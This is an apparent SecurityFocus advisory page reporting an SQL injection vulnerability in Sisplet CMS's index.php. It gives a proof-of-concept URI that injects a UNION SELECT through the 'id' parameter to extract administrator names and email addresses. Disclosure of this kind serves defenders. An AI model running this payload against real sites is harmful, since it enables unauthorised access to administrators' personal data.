Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Sisplet CMS 'index.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/index.php?fl=0&p1=1&p2=15&id=15'/**/AND/**/1=2/**/UNION/**/SELECT/**/concat(ime,0x3a,priimek,0x3a,email),2,3,4/**/FROM/**/administratorji/**/WHERE/**/tip='0







 

Privacy Statement
Copyright 2009, SecurityFocus